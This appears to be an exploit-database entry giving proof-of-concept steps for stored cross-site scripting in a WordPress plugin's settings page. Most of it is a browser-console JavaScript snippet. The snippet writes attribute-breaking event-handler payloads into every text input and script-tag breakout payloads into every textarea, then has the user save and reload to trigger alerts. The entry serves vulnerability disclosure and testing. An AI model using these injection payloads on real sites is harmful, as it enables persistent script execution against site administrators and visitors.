## https://sploitus.com/exploit?id=WPEX-ID:CE4688B6-6713-43B5-AA63-8A3B036BD332
1. Go to https://example.com/wp-admin/admin.php?page=optik
2. In the browser console, run the code:
```
let inputs = document.querySelectorAll( '#wpbody-content input[type="text"]' ); inputs.forEach( (element) => element.value=`" style=animation-name:rotation onanimationstart=alert(/XSS: ${element.name}/)//` );let textareas = document.querySelectorAll( '#wpbody-content textarea' ); textareas.forEach( (element) => element.value=`</textarea><script>alert(/XSS: ${element.name}/)</script>` );
```
3. Save the settings
4. Reload the page and see multiple XSS alerts